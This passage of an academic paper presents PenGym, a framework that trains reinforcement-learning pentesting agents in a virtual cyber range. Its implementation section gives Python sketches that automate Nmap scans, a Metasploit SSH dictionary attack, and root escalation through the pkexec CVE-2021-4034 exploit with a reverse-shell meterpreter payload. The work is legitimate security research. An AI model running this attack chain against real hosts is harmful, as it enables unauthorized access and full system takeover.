PenGym: Pentesting Training Framework for Reinforcement Learning Agents

Huynh Phuong Thanh Nguyen¹, Zhi Chen¹, Kento Hasegawa², Kazuhide Fukushima² and Razvan Beuran¹
¹Japan Advanced Institute of Science and Technology, Japan
²KDDI Research, Inc., Japan
Keywords: Penetration Testing, Reinforcement Learning, Agent Training Environment, Cyber Range.
Abstract:
Penetration testing (pentesting) is an essential method for identifying and exploiting vulnerabilities in com-
puter systems to improve their security. Recently, reinforcement learning (RL) has emerged as a promising
approach for creating autonomous pentesting agents. However, the lack of realistic agent training environ-
ments has hindered the development of effective RL-based pentesting agents. To address this issue, we pro-
pose PenGym, a framework that provides real environments for training pentesting RL agents. PenGym makes
available both network discovery and host-based exploitation actions to train, test, and validate RL agents in
an emulated network environment. Our experiments demonstrate the feasibility of this approach, with the
main advantage compared to typical simulation-based agent training being that PenGym is able to execute real
pentesting actions in a real network environment, while providing a reasonable training time. Therefore, in
PenGym there is no need to model actions using assumptions and probabilities, since actions are conducted
in an actual network and their results are real too. Furthermore, our results show that RL agents trained with
PenGym took fewer steps on average to reach the pentesting goal—7.72 steps in our experiments, compared
to 11.95 steps for simulation-trained agents.
1 INTRODUCTION
Network security plays a critical role in our current
network-centric society. Penetration testing (pentest-
ing) is an important aspect of cybersecurity that in-
volves assessing the security posture of networks or
systems by conducting ethical cyberattacks on them.
However, traditional pentesting has significant chal-
lenges to overcome, such as the lack of IT profession-
als with sufficient skills. Recently, there has been a
growing interest in applying machine learning tech-
niques to automate and improve pentesting.
In this context, reinforcement learning (RL) has
emerged as a promising approach for training agents
to perform pentesting tasks in a more effective man-
ner. Thus, RL agents aim to replicate the actions of
human pentesters, but with the speed, scale, and preci-
sion that only programs can achieve. This is achieved
by making it possible for the RL agents to navigate
complex network environments, detect vulnerabili-
ties, and exploit them to evaluate security risks. Fun-
damentally, through a process of trial and error, the
RL agents learn to optimize their actions by adapting
to various environment challenges (Zhou et al., 2021).
However, so far RL agents have been trained
and are performing penetration testing mainly in
simulated environments. Simulators provide an in-
memory abstraction of processes that occur in real
computer networks, which makes them faster and eas-
ier to use than their real counterparts. However, sim-
ulators often suffer from a “reality gap”, as the level
of abstraction used in simulators makes it difficult to
deploy the trained agents in real networks. For exam-
ple, the authors of CyberBattleSim themselves argue
that their framework is too simplistic to be used in
the real world (Microsoft Defender Research Team,
2021). This means that agent performance may suffer
when used with real networks due to the differences
with the simulated environment. In particular, the
translation of simulated actions (e.g., exploits, priv-
ilege escalation) to real actions is not trivial. As a
result, creating and operating realistic environments
for the training of pentesting AI agents is crucial.
To address this issue, we have developed PenGym,
a framework for training RL agents for pentesting
purposes using a real cyber range environment. The
key feature of PenGym is that it makes it possible for
agents to execute real actions in an actual network en-
vironment, which have real results that correspond to
RL agent state and observations. Thus, PenGym elim-
inates the need to model agent actions via execution
assumptions and success probability. Therefore, our
approach provides a more accurate representation of
the pentesting process, since everything is based on
actual network behavior, and yields more realistic re-
sults than simulation.
The effectiveness of PenGym has been validated
through several experiments, which demonstrated its
reasonable training time and suitability as an alterna-
tive to simulation-based environments. Moreover, the
trained agents were used successfully to conduct real
pentesting attacks in the cyber range.
By using PenGym, security researchers and prac-
titioners can train RL agents to perform pentesting
tasks in a safe and controlled environment, thus ob-
taining more realistic results than via simulation, but
without the risks associated with real network pen-
testing. By providing the environment for executing
actions, the framework can also be used to evaluate
and compare the effectiveness in real network envi-
ronments of various pentesting RL techniques.
The main contributions of this paper are:
- Present the design and implementation of PenGym, with particular focus on the action implementation that represents its key feature.
- Discuss a set of experiments that demonstrate the potential of using PenGym to effectively train RL agents in pentesting when compared to simulation-based training.
The remainder of this paper is organized as fol-
lows. In Section 2, we discuss related research works.
In Section 3, we provide an overview of the PenGym
architecture, followed by a detailed description of the
action/state module implementation in Section 4. We
then present the results of the validation experiments
in Section 5. The paper ends with a discussion, con-
clusions, and references.
2 RELATED WORK
The field of cybersecurity has seen a growing use of
cyber range network environments as a popular train-
ing method for cybersecurity professionals. More-
over, recent studies have explored the design and im-
plementation of cyber range environments for con-
ducting cyber attack simulations and for training RL
agents in tasks such as intrusion detection, malware
analysis, and penetration testing. We will discuss
some of the most representative studies below; a
summary of their characteristics when compared to
PenGym is given in Table 1. All approaches are
compared based on their abstraction level and execu-
tion environment features. Regarding the abstraction
level, simulation-based approaches use a simulation
environment to execute actions. In these approaches,
actions are modeled by checking several required con-
ditions, and returning success if all the conditions are
met (Schwartz and Kurniawati, 2019). On the other
hand, emulation environments require actual hosts, an
actual network topology, and agents that execute real
actions on those hosts (Li et al., 2022). When con-
sidering execution environment features, the config-
urable elements are used for comparison, including
features such as firewalls and host actions.
Several frameworks were developed for cyber
range training. SmallWorld (Furfaro et al., 2018) and
BRAWL (The MITRE Corporation, 2018) use cloud-
based infrastructure and virtualization technologies to
simulate user interaction with a host, but they lack
RL capabilities. While some training environments
for AI-assisted pentesting that focus on host-based
exploitation have been proposed in previous studies
(Pozdniakov et al., 2020)(Chaudhary et al., 2020),
their scope of game goals and available actions is
quite limited. In (Ghanem and Chen, 2018), the au-
thors proposed a training environment for network
penetration testers modeled as a Partially Observable
Markov Decision Process (POMDP), but details of
the environment and reinforcement learning training
were not provided. Another experimental testbed for
emulated RL training for network cyber operations
is Cyber Gym for Training Autonomous Agents over
Emulated Network Systems (CyGIL) (Li et al., 2022).
CyGIL uses a stateless environment architecture and
incorporates the MITRE ATT&CK framework to es-
tablish a high-fidelity training environment.
Network Attack Simulator (NASim) (Schwartz
and Kurniawati, 2019) proposed an RL agent train-
ing approach for network-wide penetration tests us-
ing the API of OpenAI Gym (Brockman et al., 2016).
NASim represents networks and cyber assets, includ-
ing hosts, devices, subnets, firewalls, services, and
applications, using abstractions modeled with a finite
state machine. The simplified action space includes
network and host discovery, service exploitation for
each configured service vulnerability in the network,
and privilege escalation for each hackable process
running in the network. The agent can simulate a sim-
plified kill chain through discovery, privilege escala-
tion, and service exploits across the network. How-
ever, NASim assumes that the simulated actions must
satisfy various predefined conditions, and uses proba-
bilities to determine their success.
Microsoft has recently open-sourced its RL agent
network training environment, the CyberBattleSim
(CBS) (Microsoft Defender Research Team, 2021),
Table 1: Comparison of related frameworks from abstraction level and environment feature perspectives. The frameworks compared are SmallWorld, BRAWL, Smart Security Audit, CyGIL, Microsoft CBS, CybORG, FARLAND, NASim, and PenGym (ours). The abstraction-level criteria are: simulation based, real hosts, real network topology, real actions, real observations, designed for RL, host-based exploitation, and network-based exploitation. The environment features are: firewalls, network scanning, host scanning (OS scan, process scan, service scan), exploits, and privilege escalation.
Privilege Escalation
which is also built using the OpenAI Gym API. CBS
is designed for red agent training that focuses on the
lateral movement phase of a cyberattack in a simu-
lated fixed network with configured vulnerabilities.
Similar to NASim, CBS allows users to define the net-
work layout and the list of vulnerabilities with their
associated nodes. It is important to note that CBS is
stated to have a highly abstract nature that cannot be
directly applied to real-world systems.
CybORG (Standen et al., 2021) is a gym for train-
ing autonomous agents through simulating and emu-
lating different environments using a common inter-
face. It supports red and blue agents, and implements
different scenarios at varying levels of fidelity. Actu-
ator objects facilitate interactions with security tools
and systems, such as executing real actions through
APIs or terminal commands, using the Metasploit
pentesting framework (Maynor, 2011). The focus of
CybORG lies in developing an autonomous pentest-
ing agent using RL and host-based exploitation, al-
though it does not consider network traffic discovery
or connections between subnets.
The FARLAND framework (Molina-Markham
et al., 2021) is designed for training agents via simu-
lation and testing agents via emulation. It offers func-
tionality such as probabilistic state representations
and support for adversarial red agents. However, un-
like CybORG, FARLAND focuses on network-based
discovery instead of host-based exploitation.
To summarize, all of the frameworks mentioned
above have their own limitations. Thus, some of them
are designed to support real environments with only
a few actions, such as exploits and privilege escala-
tion (Furfaro et al., 2018) (The MITRE Corporation,
2018) (Li et al., 2022). Moreover, some of those sys-
tems fail to consider the host configuration before at-
tempting an attack, and are not designed for RL pur-
poses (Furfaro et al., 2018) (The MITRE Corporation,
2018). Other approaches focus on either host-based
exploit actions (Microsoft Defender Research Team,
2021) (Standen et al., 2021), or network-based ac-
tions (Molina-Markham et al., 2021), but not both of
them. Only NASim (Schwartz and Kurniawati, 2019)
supports both host-based and network-based actions,
including external firewalls, but it uses a simulation
environment to carry out these actions.
Given the limitations of NASim, and taking in-
spiration from the emulation approaches discussed so
far, we have developed PenGym as an extension of
the NASim library that makes it possible to both train
and use pentesting RL agents in real network environ-
ments. PenGym covers both network traffic discovery
and host-based exploitation actions that are all actu-
ally conducted in the emulated environment.
3 PenGym OVERVIEW
PenGym is a framework for creating and managing
real environments aimed at training RL agents for
penetration testing purposes. It provides an environ-
ment where an RL agent can learn to interact with
a network environment, carrying out various pene-
tration testing tasks, such as exploit execution and
privilege escalation. PenGym uses the same API as
the Gymnasium (formerly OpenAI Gym) library, thus
making it possible to employ it with all the RL agents
that follow those specifications.
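Since the agent-environment interface follows the Gymnasium specification, any agent written against it interacts with PenGym through the standard reset/step loop. The following Python sketch illustrates this loop for a tabular, epsilon-greedy agent; it assumes a discrete action space and hashable observations, and the helper names are our own rather than part of PenGym's API.

import random

def run_episode(env, q_table, epsilon=0.1, max_steps=100):
    """One episode against a Gymnasium-compatible environment (illustrative sketch)."""
    obs, info = env.reset()                 # Gymnasium reset() returns (observation, info)
    state = str(obs)                        # hashable key for the tabular Q-table
    total_reward = 0.0
    for _ in range(max_steps):
        if random.random() < epsilon:       # explore: pick a random action
            action = env.action_space.sample()
        else:                               # exploit: pick the best known action
            action = max(range(env.action_space.n),
                         key=lambda a: q_table.get((state, a), 0.0))
        obs, reward, terminated, truncated, info = env.step(action)
        state = str(obs)
        total_reward += reward
        if terminated or truncated:         # goal reached or episode cut off
            break
    return total_reward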
An overview of PenGym is shown in Figure 1.
First, the RL agent selects an action from the avail-
able space using an algorithm suited to its learning
objectives. Subsequently, PenGym converts this logi-
cal action into an executable real action, which is then
executed in the cyber range environment set up using
KVM virtual machines. Following action execution,
the actual observations, such as available services or
exploit status, along with the new state of the envi-
ronment, are interpreted by PenGym and sent back to
the agent. The agent receives a corresponding reward
and relevant system information. The rewards are de-
fined via a scenario file, which contains different pos-
itive rewards for each successfully executed action. In
case of failure, the agent receives a negative reward.
For the scope of this paper, the reward values used
adhere to those predefined in NASim. The agent then
updates its learning algorithm to select the next suit-
able action. For example, if an observation shows a
certain available service, the agent can use an exploit
based on that service for the next step. The use of the
acquired state information and corresponding reward
to refine and enhance the underlying algorithm, ulti-
mately fosters the RL agent’s learning and optimiza-
tion process. This key functionality of PenGym is
implemented via its core component, the Action/State
Module, which has two main roles:
- Convert the actions generated by the RL agent into real actions that are executed in the Cyber Range environment.
- Interpret the outcome of the actions and return the state of the environment and the reward to the agent, so that processing can continue.
Figure 1: Overview of the PenGym architecture.
The Action/State Module implements a
range of penetration testing techniques that are exe-
cuted on actual target hosts, thus enabling penetration
testing in conditions similar to real-world scenarios.
The Cyber Range in PenGym is created using
KVM virtualization technology to build a custom net-
work environment that hosts virtual machines, with
each cyber range consisting of a predefined group
of hosts, services, and vulnerabilities that are made
available for the interaction with the RL agent. The
composition and content of a cyber range is deter-
mined based on the content of NASim scenario files in
order to build an equivalent environment in PenGym.
NASim scenario files act as a blueprint for the cy-
ber range environment and a guide for the behavior of
the agents. In particular, they define: (i) the network
environment, such as the characteristics of the various
hosts (e.g., operating system, processes and services,
etc.), subnets and firewall rules between hosts, and (ii)
the actions that RL agents can take, how rewards are
obtained and what pre-conditions are necessary for
the agents to perform those actions successfully.
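For illustration, the kind of information such a scenario file conveys can be summarized as in the Python sketch below; the key names and values are simplified assumptions made for this example and do not reproduce the actual NASim YAML schema or the real 'tiny' scenario contents.

# Simplified, illustrative view of what a scenario describes (not the NASim schema).
scenario_sketch = {
    "subnets": {"subnet1": 1, "subnet2": 1, "subnet3": 1},   # subnet sizes
    "hosts": {
        "(1, 0)": {"os": "linux", "services": ["ssh"], "processes": ["tomcat"]},
        "(2, 0)": {"os": "linux", "services": ["ssh"], "processes": ["tomcat"]},
        "(3, 0)": {"os": "linux", "services": ["ssh"], "processes": ["tomcat"]},
    },
    # Firewall rules: which service traffic is allowed between subnets.
    "firewall": {("internet", "subnet1"): ["ssh"], ("subnet1", "subnet2"): []},
    # Actions, their rewards/costs, and the pre-conditions required for success.
    "exploits": {"e_ssh": {"service": "ssh", "os": "linux", "cost": 3}},
    "privilege_escalation": {"pe_tomcat": {"process": "tomcat", "os": "linux", "cost": 1}},
}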
4 IMPLEMENTATION
In NASim, the action space is a collection of feasible
actions an agent can execute. These actions include
various scan actions (e.g., service scan, OS scan, pro-
cess scan, and subnet scan) that help identify vulnera-
bilities and access points in the network. They mimic
the functionality of the Nmap utility (Lyon, 2014),
providing information about active services and the
operating system running on a specified host.
The action space in NASim allows for exploit ac-
tions on services and machines in the network, which
can lead to unauthorized access and the exploitation
of vulnerabilities. The success of an exploit action is
determined by factors such as the existence of the tar-
get service, firewall rules, and the success probability.
Privilege escalation, a tactic to gain higher access, is
also included. Thus, NASim simulates various net-
work security mechanisms.
One major limitation of using simulated actions
as done in NASim is that those actions may not accu-
rately replicate the real-world behavior. Although the
result of an action is determined by checking specific
conditions in the description file, it is important to rec-
ognize that other factors can also impact the success
of the action. Moreover, the network environment it-
self may not be accurately replicated in simulation,
including the configuration and topology of the net-
work. Therefore, while simulation can provide valu-
able insights into network security, real-world execu-
tion is the only way to determine the effectiveness of
penetration testing agents.
The Action/State Module in PenGym aims to
bridge this gap by enabling the actual execution of RL
agent actions in the target cyber range. The outcome
of each action is determined based on the current sta-
tus of the virtual machine (VM) host in the network
environment, reflecting the real conditions of the sys-
tem. The actions currently implemented in PenGym
cover the entire functionality of NASim as required
by the scope of the ‘tiny’ scenario used in our exper-
iments, and can be extended for other scenarios. The
PenGym action space is divided into six categories:
1. Service Scan
2. Operating System (OS) Scan
3. Subnet Scan
4. Exploit
5. Process Scan
6. Privilege Escalation
For Service Scan, OS Scan and Subnet Scan,
the real action implementation leverages the Nmap
utility (Lyon, 2014) to retrieve information about
the services and operating system of each host, and
the accessible subnets. More specifically, we use
the python-nmap library (Norman, 2021) to control
Nmap via the Python programming language.
The Exploit and Privilege Escalation actions
leverage the Metasploit penetration testing framework
(Maynor, 2011) to actually execute the correspond-
ing actions on the real target hosts. In particular, we
use the pymetasploit3 library (McInerney, 2020) to
control Metasploit execution via Python.
As for Process Scan, it is implemented by using
the ps command from the Linux operating system.
Note that, in order to reduce the execution time of
the actual actions, after the first successful execution
of an action, the relevant information regarding the
result of that action is stored in a host map dictionary
and reused for subsequent executions. During testing,
this dictionary is used only for a single pentesting
execution period, which ends when the target hosts are
compromised or the step limit is exceeded. Similarly,
during training it is used for a single training run,
which ends when all the training epochs are finished.
At the beginning of each testing period or training run,
the dictionary is reset to an empty state. This ensures
that the optimization strategy does not affect the real-
ism of the overall training process or the evaluation of
trained agents during testing. It helps minimize time
by avoiding redundant actions that have already been
successful in the same period. This mimics real-world
situations where a pentester does not repeat successful
actions. Therefore, using the host map dictionary in
PenGym helps optimize execution time while main-
taining training realism. The following sections pro-
vide more details about each action implementation.
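The caching idea can be summarized by the following minimal Python sketch; the dictionary layout and function names are illustrative and do not correspond to PenGym's internal data structures.

host_map = {}   # maps (host, action) pairs to previously obtained results

def run_action_cached(host, action_name, run_real_action):
    """Execute a real action only once per host within a testing period or training run."""
    key = (host, action_name)
    if key not in host_map:                 # first execution: run the real action
        host_map[key] = run_real_action(host)
    return host_map[key]                    # later executions reuse the stored result

def reset_host_map():
    """Called at the start of each testing period or training run."""
    host_map.clear()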
4.1 Service Scan
Service scanning is used to identify and provide de-
tails about the services that are running on a host. It
can also aid in the detection of potential vulnerabili-
ties in those services. To implement the Service Scan
action, we make use of the Nmap utility, which makes
it possible for PenGym to identify a wide range of ser-
vices, including web servers, SSH services, etc. Upon
success, the list of services running on the target host
is returned. The pseudocode for the implementation is
provided in Algorithm 1. Several arguments are used
to minimize the execution time of Nmap (-Pn to dis-
able ping use, -n to disable DNS resolution, and -T5
to enable the most aggressive timing template), and
-sS is used to enable TCP SYN scanning.
Algorithm 1: Service Scan Action.
Require: host, nmap, port=False
if port exists then
    result ← nmap.scan(host, port, arguments='-Pn -n -sS -T5')
else
    result ← nmap.scan(host, arguments='-Pn -n -sS -T5')
end if
service_list ← list()
for host in result do
    if host[port][state] is OPEN then
        service_list.append(service_name)
    end if
end for
Return service_list
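For reference, the real Service Scan action roughly corresponds to the following python-nmap usage; this is a minimal sketch under the same Nmap arguments as Algorithm 1, and the parsing of the scan results assumes python-nmap's standard result dictionary rather than PenGym's exact code.

import nmap  # python-nmap wrapper around the Nmap scanner

def service_scan(host, port="22"):
    """Sketch of a Service Scan: return the names of services found on open ports."""
    nm = nmap.PortScanner()
    # -Pn: skip host discovery, -n: no DNS resolution, -T5: fastest timing template,
    # -sS: TCP SYN scan (requires root privileges).
    nm.scan(hosts=host, ports=port, arguments="-Pn -n -sS -T5")
    services = []
    for scanned_host in nm.all_hosts():
        for proto in nm[scanned_host].all_protocols():        # e.g. 'tcp'
            for _, port_info in nm[scanned_host][proto].items():
                if port_info["state"] == "open":
                    services.append(port_info["name"])        # e.g. 'ssh'
    return services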
4.2 OS Scan
OS scanning is used to identify the operating system
that is running on a target host. This functionality
works by sending a series of probes to the target ma-
chine and analyzing the responses to determine the
characteristics of the operating system. The accuracy
of the scan results depends on the response from the
target machine and the effectiveness of the probing
technique used. The OS Scan action is implemented
via the Nmap utility. Upon success, the action will re-
turn the list of potential operating systems running on
the target host, as identified by Nmap. The pseudocode
for the implementation is provided in Algorithm 2.
In addition to time-optimization arguments, the argu-
ment -O is used to activate OS detection.
Algorithm 2: OS Scan Action.
Require: host, nmap, port=False
if port exists then
    result ← nmap.scan(host, port, arguments='-Pn -n -O -T5')
else
    result ← nmap.scan(host, arguments='-Pn -n -O -T5')
end if
os_list ← list()
for item in result do
    os_list.append(get_os_type(item))
end for
Return os_list
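A corresponding python-nmap sketch for the OS Scan differs only in the -O flag and in the field that is parsed; the use of the 'osmatch' key below reflects how python-nmap typically exposes OS detection results and is an assumption rather than PenGym's exact code.

import nmap

def os_scan(host, port="22"):
    """Sketch of an OS Scan: return Nmap's candidate operating system names."""
    nm = nmap.PortScanner()
    # Same time-optimization flags as the service scan, plus -O for OS detection
    # (OS detection also requires root privileges).
    nm.scan(hosts=host, ports=port, arguments="-Pn -n -O -T5")
    os_list = []
    for scanned_host in nm.all_hosts():
        for match in nm[scanned_host].get("osmatch", []):      # OS detection results
            os_list.append(match["name"])                      # e.g. 'Linux 5.X'
    return os_list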
4.3 Subnet Scan
Algorithm 3: Subnet Scan Action.
Require: subnet, nmap, port=False
host_list ← list()
if port exists then
    result ← nmap.scan(subnet, port, arguments='-Pn -n -sS -T5 -minparallel 100 -maxparallel 100')
    for host in result do
        if host['tcp'][port][state] is OPEN then
            host_list.append(host)
        end if
    end for
else
    result ← nmap.scan(subnet, arguments='-Pn -n -sS -T5 -minparallel 100 -maxparallel 100')
    for host in result do
        if host[status][state] is UP then
            host_list.append(host)
        end if
    end for
end if
Return host_list
Subnet scanning is a type of scan used to identify the
active hosts within a specified network range, so that
the potential targets in that subnet can be determined.
Nmap subnet scanning works by sending a ping mes-
sage to each IP address within the specified network
range and then analyzing the responses to determine
which hosts are active.
The Subnet Scan action in PenGym is imple-
mented by using Nmap to scan the specified net-
work range and retrieve the active hosts. Upon suc-
cess, the list of the discovered hosts is returned; note
that we differentiate between already discovered and
newly discovered hosts, so that new potential targets
can be easily identified. The implementation pseu-
docode is provided in Algorithm 3. In addition to time
optimization, -minparallel and -maxparallel are
used to enable the parallel probing of the hosts.
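A python-nmap sketch of the Subnet Scan is shown below; it uses Nmap's full option names --min-parallelism and --max-parallelism for the parallel probing settings referenced in Algorithm 3, and the result parsing is a simplified assumption rather than PenGym's exact code.

import nmap

def subnet_scan(subnet, port=None):
    """Sketch of a Subnet Scan: return the addresses of hosts that respond in the subnet."""
    nm = nmap.PortScanner()
    # Parallel probing options greatly reduce the scan time for a whole subnet.
    args = "-Pn -n -sS -T5 --min-parallelism 100 --max-parallelism 100"
    if port:
        nm.scan(hosts=subnet, ports=str(port), arguments=args)
        return [h for h in nm.all_hosts()
                if nm[h].has_tcp(int(port)) and nm[h]["tcp"][int(port)]["state"] == "open"]
    nm.scan(hosts=subnet, arguments=args)
    return [h for h in nm.all_hosts() if nm[h].state() == "up"]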
4.4 Exploit
Exploits are techniques for finding and taking advan-
tage of vulnerabilities in software or systems to gain
unauthorized access or perform malicious actions. A
successful exploit will result in the target machine be-
coming compromised, and further steps can be per-
formed, such as stealing sensitive data, installing mal-
ware, or taking control of the system. Therefore, ex-
ploits are critical components of the penetration test-
ing process for advancing towards a target.
In PenGym, the Exploit action is implemented via
the Metasploit (Maynor, 2011) framework. Upon suc-
cessful completion, the shell object that makes it pos-
sible to access the target host, and the access level
(typically “USER”) are returned. The returned shell
object can be used to execute shell commands or navi-
gate through the file system. The returned access level
can be used to determine what actions are allowed or
restricted for the current user. The pseudocode for
the implementation is provided in Algorithm 4. The
Exploit action is currently implemented via an SSH
exploit based on the dictionary attack technique.
Algorithm 4: SSH Exploit Action.
Require: host
msfrpc ← get_msfrpc_client()
shell ← check_shell_exist()
if shell exists then
    shell ← get_existed_shell_of_host()
    access_level ← get_host_access_level()
    Return shell, access_level
else
    exploit_ssh ← msfrpc.modules.use('auxiliary', 'auxiliary/scanner/ssh/ssh_login')
    exploit_ssh['rhost'] ← host
    exploit_ssh['username'] ← username
    exploit_ssh['pass_file'] ← pass_file
end if
result ← exploit_ssh.execute()
shell ← get_shell(result)
access_level ← get_host_access_level()
Return shell, access_level
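A minimal pymetasploit3 sketch of the Metasploit part of Algorithm 4 is given below; the RPC connection details, the ssh_login option names, and the session-polling logic are assumptions made for illustration, not PenGym's exact implementation.

import time
from pymetasploit3.msfrpc import MsfRpcClient

def ssh_exploit(host, username, pass_file, rpc_password):
    """Sketch of the SSH dictionary attack; returns (shell_session, access_level)."""
    client = MsfRpcClient(rpc_password)                 # connect to a running msfrpcd
    mod = client.modules.use("auxiliary", "scanner/ssh/ssh_login")
    mod["RHOSTS"] = host
    mod["USERNAME"] = username
    mod["PASS_FILE"] = pass_file                        # dictionary of candidate passwords
    mod.execute()                                       # runs as a background job
    for _ in range(30):                                 # poll until a shell session appears
        for sid, info in client.sessions.list.items():
            if info.get("session_host") == host:
                return client.sessions.session(sid), "USER"
        time.sleep(1)
    return None, None                                   # exploit failed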
4.5 Process Scan
Process scanning enables pentesters to conduct a thor-
ough security assessment by identifying the processes
running on a target host. This is done in view of de-
termining which vulnerabilities can potentially be ex-
ploited for getting further control of the host, such as
via privilege escalation techniques. Note that process
scanning requires access to the target host, hence it is
executed after successfully gaining access to it.
The Process Scan implementation in PenGym uti-
lizes the shell object obtained via the Exploit action,
and uses it to execute the ps command, which collects
information about the processes running on the target
host; upon success, the list of processes is returned.
To speed up process information extraction, the -A
and -o options are used to reduce execution time by
extracting only essential user values associated with
the running processes, minimizing unnecessary over-
head. This approach ensures a faster retrieval of pro-
cess information and simplifies subsequent manage-
ment of the extracted data (the implementation pseu-
docode is not included due to space limitations).
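A sketch of how the ps command could be issued through the previously obtained Metasploit shell session is shown below; the write/read calls and the one-second wait are simplifying assumptions, not PenGym's exact code.

import time

def process_scan(shell):
    """Sketch of a Process Scan through an existing Metasploit shell session."""
    # -A lists all processes; -o restricts the output to the needed columns,
    # which keeps the transferred data (and thus the execution time) small.
    shell.write("ps -A -o user,comm\n")
    time.sleep(1)                          # give the remote command time to complete
    output = shell.read()                  # raw text produced by ps on the target host
    # Drop the header line and keep one "USER COMMAND" entry per running process.
    return [line.strip() for line in output.splitlines()[1:] if line.strip()]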
4.6 Privilege Escalation
Algorithm 5: Privilege Escalation Action.
Require: host
msfrpc ← get_msfrpc_client()
root_shell ← check_root_shell_exist()
normal_shell_id ← get_normal_shell_id()
if root_shell exists then
    root_shell ← get_root_shell()
    access_level ← get_host_access_level()
    Return root_shell, access_level
else
    exploit_pkexec ← msfrpc.modules.use('linux/local/cve_2021_4034_pkexec')
    exploit_pkexec['session'] ← normal_shell_id
    payload ← 'meterpreter/reverse_tcp'
end if
result ← exploit_pkexec.execute()
root_shell ← get_shell(result)
access_level ← get_host_access_level()
Return root_shell, access_level
Privilege escalation is an essential step in pentesting
by which one attempts to gain administrator (root) ac-
cess on the target system. By obtaining a higher ac-
cess level than that of a regular user, a pentester gains
complete control of the target system and can perform
any actions on it. Privilege escalation is achieved
by exploiting specific vulnerabilities or misconfigu-
rations of the system to gain root level access. Note
that privilege escalation is conducted after success-
fully gaining regular user access to the target host.
The implementation of the Privilege Escalation
action utilizes the shell object obtained via the Ex-
ploit action to execute a privilege escalation ex-
ploit. In particular, we use the CVE-2021-4034
vulnerability in the pkexec program (National Vul-
nerability Database, 2021), for which a correspond-
ing module is implemented in Metasploit, named
linux/local/cve_2021_4034_pkexec. The imple-
mentation pseudocode is shown in Algorithm 5.
Optimizing the execution time of privilege escalation is an important part of making PenGym run efficiently, and we achieved this as follows (see also the sketch after this list):
- Disable the AutoCheck attribute in Metasploit.
- Return the result of the privilege escalation function as soon as a meterpreter session is created, instead of waiting for the job to finish.
- Clean up the Metasploit sessions and jobs only after an attack sequence ends.
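A pymetasploit3 sketch reflecting these optimizations is shown below; the module path follows the name given above, while the SESSION, AutoCheck, and payload option names are typical Metasploit conventions assumed for illustration and may differ in a concrete setup.

def privilege_escalation(client, shell_id, lhost):
    """Sketch of the pkexec (CVE-2021-4034) privilege escalation step.

    client is assumed to be a connected pymetasploit3 MsfRpcClient instance.
    """
    mod = client.modules.use("exploit", "linux/local/cve_2021_4034_pkexec")
    mod["SESSION"] = shell_id            # reuse the shell obtained by the SSH exploit
    mod["AutoCheck"] = False             # skip the vulnerability pre-check to save time
    payload = client.modules.use("payload", "linux/x64/meterpreter/reverse_tcp")
    payload["LHOST"] = lhost             # listener address for the reverse connection
    # Launch the exploit and return immediately; the caller can then poll
    # client.sessions.list for the new meterpreter session instead of waiting
    # for the Metasploit job itself to finish.
    return mod.execute(payload=payload)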
5 EXPERIMENTS
In this section we discuss first the main experiment
scenario, then the action implementation validation,
followed by several RL agent experiments.
5.1 Main Experiment Scenario
We used the scenario named ‘tiny’ defined in NASim,
which is illustrated in Figure 2, both for RL agent
training and testing. This scenario consists of three
hosts divided into three subnets. Subnet(1) is directly
connected to the Internet, and the other subnets are in-
ternally connected. Each host has the same basic con-
figuration, with a Linux OS, SSH service, and Tomcat
process. Firewall rules are enforced for secure com-
munication between subnets, and only SSH commu-
nication is allowed. Specifically, Subnet(1) is accessi-
ble from the Internet via SSH but cannot connect ex-
ternally. SSH access is allowed between subnets, ex-
cept for the connection from Subnet(1) to Subnet(2).
In practice, these restrictions were implemented via
the iptables Linux firewall configuration utility.
For experiment purposes, we used KVM technol-
ogy to create a network environment that is based on
the ‘tiny’ scenario. This environment included all the
configurations defined in this scenario, such as the
hosts and their settings, and the composition of the
subnets. In our experiments specific techniques are
used for exploits and privilege escalation. Namely, an
SSH dictionary attack is utilized to login to hosts, and
a pkexec vulnerability is used to obtain root access.
User accounts and passwords were set up accordingly
on the target hosts to enable these actions. The ex-
periments were conducted on a dual 12-core 2.2 GHz
Intel(R) Xeon(R) Silver 4214 CPU server with 64 GB
RAM. The NASim version we utilized was v0.10.0.
5.2 Action Implementation Validation
Table 2 provides a summary of the action implemen-
tation in NASim and PenGym. We also show the ac-
tion execution times (for PenGym, only the time of
the very first execution of an action within a session
is reported, since we cache the output data to speed
up subsequent executions).
Next we discuss the validation of action implemen-
tations in PenGym to demonstrate their equivalence
with NASim actions in terms of observations.
Figure 2: Cyber range constructed in PenGym based on the ‘tiny’ scenario in NASim.
Table 2: Comparison of action implementation and execution time between NASim and PenGym.

OS Scan
  NASim: Check if the host is discovered and return its configured OS type (0.000006 s)
  PenGym: Check if the host is discovered and scan the OS type using nmap (3.642790 s)
Service Scan
  NASim: Check if the host is discovered and return its configured services (0.000004 s)
  PenGym: Check if the host is discovered and scan the running services using nmap (0.274271 s)
Exploit
  NASim: Check if the host is discovered and probabilistically update its state to "compromised" (0.000023 s)
  PenGym: Check if the host is discovered and execute an SSH dictionary attack to compromise it (1.217554 s)
Subnet Scan
  NASim: Check if the host is compromised and return the connected hosts within the subnet (0.000028 s)
  PenGym: Check if the host is compromised and scan the connected hosts within its subnet using nmap (2.486091 s)
Process Scan
  NASim: Check if the host is compromised and return its configured processes (0.000005 s)
  PenGym: Check if the host is compromised and scan the running processes using ps (0.256476 s)
Privilege Escalation
  NASim: Check if the host is compromised and update the access level of the host to ROOT (0.000021 s)
  PenGym: Check if the host is compromised and execute privilege escalation via a pkexec vulnerability (13.174906 s)
Service Scan. In the context of the ‘tiny’ scenario,
the target service that needs to be determined is SSH.
To use the Service Scan action, the target host value
must be provided, while the port value is optional. For
SSH, we provide port 22 in order to minimize the time
spent scanning unused ports. When the Service Scan
action is executed, it scans the specified host for open
ports and matches them to the assigned port value, if
it exists. The observations after executing the service
scan (Algorithm 1) are equivalent in the NASim and
PenGym environments, as follows:
NASim: {’ssh’: 1.0}, where 1.0 means True
PenGym: [’ssh’]
OS Scan. For the OS scan in the ‘tiny’ scenario, the
target operating system that needs to be determined
is Linux. To minimize execution time, only port 22
is provided as an optional value for scanning. If the
corresponding ports are open and match the assigned
port value, a list of the ascertained operating systems
is returned. The observations after executing the OS
scan (Algorithm 2) are equivalent in the NASim and
PenGym environments (details were not included due
to space limitations).
Subnet Scan. PenGym uses Nmap to execute sub-
net scans to identify active hosts within a subnet, and
returns a list with the IP addresses of all the inter-
faces of those active hosts. Using the subnet scan ex-
ecution on Host(1,0) as an example, the observations
after running the action (Algorithm 3) for the ‘tiny’
scenario are equivalent in the NASim and PenGym en-
vironments, as follows:
NASim: discovered={(1, 0): True,
